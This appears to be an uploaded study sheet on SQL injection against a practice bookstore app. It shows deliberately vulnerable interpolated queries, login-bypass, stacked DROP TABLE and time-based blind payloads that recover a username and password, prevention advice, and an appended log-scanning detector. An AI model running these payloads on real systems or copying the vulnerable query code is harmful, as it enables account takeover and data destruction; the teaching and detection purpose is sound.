sql injection

Uploaded by Natty 123

CREATE TABLE books (
    id INT PRIMARY KEY,
    title VARCHAR(50),
    author VARCHAR(50),
    price DECIMAL(10,2)
);

INSERT INTO books (id, title, author, price) VALUES
    (1, 'Book 1', 'Author A', 43.00),
    (2, 'Book 2', 'Author B', 34.00),
    (3, 'Book 3', 'Author C', 65.00),
    (4, 'Book 4', 'Author D', 54.00),
    (5, 'Book 5', 'Author E', 15.49);

1. Basic SQL Injection

Purpose: Bypass authentication or extract data by injecting logical conditions.

Attack Steps:

1. Login Route SQL Query:

   const sql = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

2. Input Example:
   ○ Username: ' OR 1=1 --
   ○ Password: anything

3. Resulting Query:

   SELECT * FROM users WHERE username = '' OR 1=1 -- AND password = 'anything';

4. Outcome:
   ○ The condition OR 1=1 always evaluates as true.
   ○ Logs in as the first user in the database (e.g., admin).

2. Modify Database

Purpose: Alter database records or inject new commands into the query.

Attack Steps:

1. Update Route SQL Query:

   // newPrice is interpolated unquoted, which is why the payload below needs no closing quote
   const sql = `UPDATE books SET price = ${newPrice} WHERE id = '${bookId}'`;

2. Input Example:
   ○ Book ID: 1
   ○ New Price: 0, title = 'Hacked!'

3. Resulting Query:

   UPDATE books SET price = 0, title = 'Hacked!' WHERE id = '1';

4. Outcome:
   ○ Updates the book's price to 0 and its title to Hacked!.


3. Content-Based Blind SQL Injection

Purpose: Extract data by observing the application's behavior (e.g., error messages, response content).

Attack Steps:

1. Login Route SQL Query:

   const sql = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

2. Input Example:
   ○ Username: ' AND 1=1 --
   ○ Password: anything

3. Resulting Query:

   SELECT * FROM users WHERE username = '' AND 1=1 -- AND password = 'anything';

4. Outcome:
   ○ If true, returns the first user (e.g., admin).
   ○ For testing incorrect conditions:
     ■ Username: ' AND 1=2 --
     ■ Observe changes in the response to infer data.


4. Time-Based Blind SQL Injection

Purpose: Extract data by causing delays to infer conditions without visible responses.

Attack Steps:

1. Login Route SQL Query:

   const sql = `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;

2. Input Example:
   ○ Username: ' AND IF(1=1, SLEEP(5), 0) --
   ○ Password: anything

3. Resulting Query:

   SELECT * FROM users WHERE username = '' AND IF(1=1, SLEEP(5), 0) -- AND password = 'anything';

4. Outcome:
   ○ If the condition is true, the server delays for 5 seconds.
   ○ Refine queries to extract data character by character (e.g., check specific usernames).

5. Multiple SQL Statements

Purpose: Inject multiple commands to execute unintended operations.

Attack Steps:

1. Update Route SQL Query:

   // newPrice is interpolated unquoted, so the payload can end the statement directly
   const sql = `UPDATE books SET price = ${newPrice} WHERE id = '${bookId}'`;

2. Input Example:
   ○ Book ID: 1
   ○ New Price: 0; DROP TABLE books; --

3. Resulting Query:

   UPDATE books SET price = 0; DROP TABLE books; -- WHERE id = '1';

4. Outcome:
   ○ Drops the books table, deleting all its data.
   ○ Only works if multipleStatements: true is enabled in your db configuration.

Testing the Attacks:

1. Use tools like Postman, cURL, or a web browser to send requests.
2. Adjust input fields in the login and update forms to inject the payloads.
3. Observe the results in the database or responses for confirmation.

Prevention:

● Parameterized Queries: Use ? placeholders and pass inputs securely.
● Sanitize Inputs: Strip out dangerous characters like ;, ', and --.
● Limit Permissions: Avoid granting unnecessary permissions (e.g., DROP or DELETE).
● Enable Logging: Monitor suspicious activities and respond quickly.

By testing and understanding these attacks, you can better secure your bookstore application against vulnerabilities.

Time-Based Blind SQL Injection - Detailed Documentation

This attack determines data such as username and password by observing the time it takes for
the database to respond. The attacker leverages conditional statements (e.g., IF) to cause
deliberate delays.

Steps to Extract Data Using Time-Based Blind SQL Injection

Step 1: Test for Vulnerability

1. Target Endpoint: /login (POST method).
2. Initial Query:
   ○ Username: ' OR IF(1=1, SLEEP(5), 0) --
   ○ Password: anything
3. Resulting SQL:

   SELECT * FROM users WHERE username = '' OR IF(1=1, SLEEP(5), 0) -- AND password = 'anything';

4. Outcome:
   ○ If the query delays for 5 seconds, the endpoint is vulnerable to time-based SQL injection.

Step 2: Determine Username Length

1. Query Format:
   ○ Username: ' OR IF(LENGTH(username)=X, SLEEP(5), 0) --
   ○ Password: anything
2. Example with admin:
   ○ Username: ' OR IF(LENGTH(username)=5, SLEEP(5), 0) --
   ○ Password: anything
3. Resulting SQL:

   SELECT * FROM users WHERE username = '' OR IF(LENGTH(username)=5, SLEEP(5), 0) -- AND password = 'anything';

4. Outcome:
   ○ Delays confirm the username length (e.g., 5 for admin).

Step 3: Determine Username Character by Character

1. Query Format:
   ○ Username: ' OR IF(SUBSTRING(username, N, 1)='C', SLEEP(5), 0) --
   ○ Password: anything
2. Example for First Character:
   ○ Username: ' OR IF(SUBSTRING(username, 1, 1)='a', SLEEP(5), 0) --
   ○ Password: anything
3. Resulting SQL:

   SELECT * FROM users WHERE username = '' OR IF(SUBSTRING(username, 1, 1)='a', SLEEP(5), 0) -- AND password = 'anything';

4. Outcome:
   ○ Delays confirm if the first character is a.
   ○ Repeat for subsequent characters (e.g., 2, 3, ...) to extract the full username (admin).

Step 4: Determine Password Length

1. Query Format:
   ○ Username: ' AND IF(LENGTH(password)=X, SLEEP(5), 0) --
   ○ Password: anything
2. Example with adminpass:
   ○ Username: ' AND IF(LENGTH(password)=9, SLEEP(5), 0) --
   ○ Password: anything
3. Resulting SQL:

   SELECT * FROM users WHERE username = '' AND IF(LENGTH(password)=9, SLEEP(5), 0) -- AND password = 'anything';

4. Outcome:
   ○ Delays confirm the password length.

Step 5: Determine Password Character by Character

1. Query Format:
   ○ Username: ' AND IF(SUBSTRING(password, N, 1)='C', SLEEP(5), 0) --
   ○ Password: anything
2. Example for First Character:
   ○ Username: ' AND IF(SUBSTRING(password, 1, 1)='a', SLEEP(5), 0) --
   ○ Password: anything
3. Resulting SQL:

   SELECT * FROM users WHERE username = '' AND IF(SUBSTRING(password, 1, 1)='a', SLEEP(5), 0) -- AND password = 'anything';

4. Outcome:
   ○ Delays confirm if the first character is a.
   ○ Repeat for subsequent characters to extract the full password.

Example Workflow for Extracting admin and adminpass

1. Determine username length:
   ○ ' OR IF(LENGTH(username)=5, SLEEP(5), 0) --
   ○ Response delay confirms username length is 5.
2. Determine username (admin):
   ○ ' OR IF(SUBSTRING(username, 1, 1)='a', SLEEP(5), 0) -- → Delays.
   ○ Repeat for all characters.
3. Determine password length:
   ○ ' AND IF(LENGTH(password)=9, SLEEP(5), 0) --
   ○ Response delay confirms password length is 9.
4. Determine password (adminpass):
   ○ ' AND IF(SUBSTRING(password, 1, 1)='a', SLEEP(5), 0) -- → Delays.
   ○ Repeat for all characters.

Outcome of the Attack

● Extracted Username: admin
● Extracted Password: adminpass

Mitigation Strategies

● Use Parameterized Queries: Avoid concatenating input into SQL queries.
● Limit Query Execution Time: Prevent excessive delays from SLEEP() injections.
● Implement Captchas: Thwart automated brute-force attempts.
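As an added example (not from the original document), this is the detection side of the Enable Logging and Limit Query Execution Time points: it runs over a few constructed request-log lines for the /login and update routes, flags the payload shapes documented above together with the response-time signature of a SLEEP(5) probe, and counts probes per source so the character-by-character loop of Steps 2 to 5 surfaces as one alert. The log format, the sample lines and the 4000 ms threshold are assumptions.

```javascript
// Added example, not from the original document. The log format is a constructed
// assumption: "<ip> <method> <route> <status> <duration_ms> username=<raw input>".
const SAMPLE_LOG = [
  "10.0.0.7 POST /login 200 12 username=alice",
  "10.0.0.9 POST /login 200 9 username=' OR 1=1 --",
  "10.0.0.9 POST /login 200 5011 username=' OR IF(LENGTH(username)=5, SLEEP(5), 0) --",
  "10.0.0.9 POST /login 200 5008 username=' OR IF(SUBSTRING(username, 1, 1)='a', SLEEP(5), 0) --",
  "10.0.0.9 POST /login 200 14 username=' OR IF(SUBSTRING(username, 2, 1)='a', SLEEP(5), 0) --",
  "10.0.0.4 POST /books/1 200 20 username=bob",
].join("\n");

// Signatures derived from the payloads documented above.
const SIGNATURES = [
  { name: "quote then comment", re: /'\s*(?:OR|AND)\b[\s\S]*--/i },
  { name: "tautology", re: /\bOR\s+1\s*=\s*1\b/i },
  { name: "time-based probe", re: /\bSLEEP\s*\(/i },
  { name: "stacked statement", re: /;\s*(?:DROP|DELETE)\b/i },
];
// SLEEP(5) shows up as a ~5 s response; a real login on this app takes milliseconds.
const SLOW_MS = 4000;

function parseLine(line) {
  const m = /^(\S+) (\S+) (\S+) (\d+) (\d+) username=(.*)$/.exec(line);
  if (!m) return null;
  return { ip: m[1], method: m[2], route: m[3], status: +m[4], ms: +m[5], username: m[6] };
}

// One finding per suspicious request: which signatures hit and whether it was slow. A slow
// request with no signature is still reported, since encoding can defeat a regex but not timing.
function analyzeLog(text) {
  const findings = [];
  for (const line of text.split("\n")) {
    const rec = parseLine(line);
    if (!rec) continue;
    const hits = SIGNATURES.filter((s) => s.re.test(rec.username)).map((s) => s.name);
    const slow = rec.ms >= SLOW_MS;
    if (hits.length || slow) findings.push({ ip: rec.ip, route: rec.route, hits, slow });
  }
  return findings;
}

// Probes per source IP: the character-by-character loop of Steps 2 to 5 needs many
// requests, so a count over a short window is the signal to alert and rate-limit on.
function probeCounts(findings) {
  const counts = {};
  for (const f of findings) {
    if (f.hits.includes("time-based probe")) counts[f.ip] = (counts[f.ip] || 0) + 1;
  }
  return counts;
}
```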
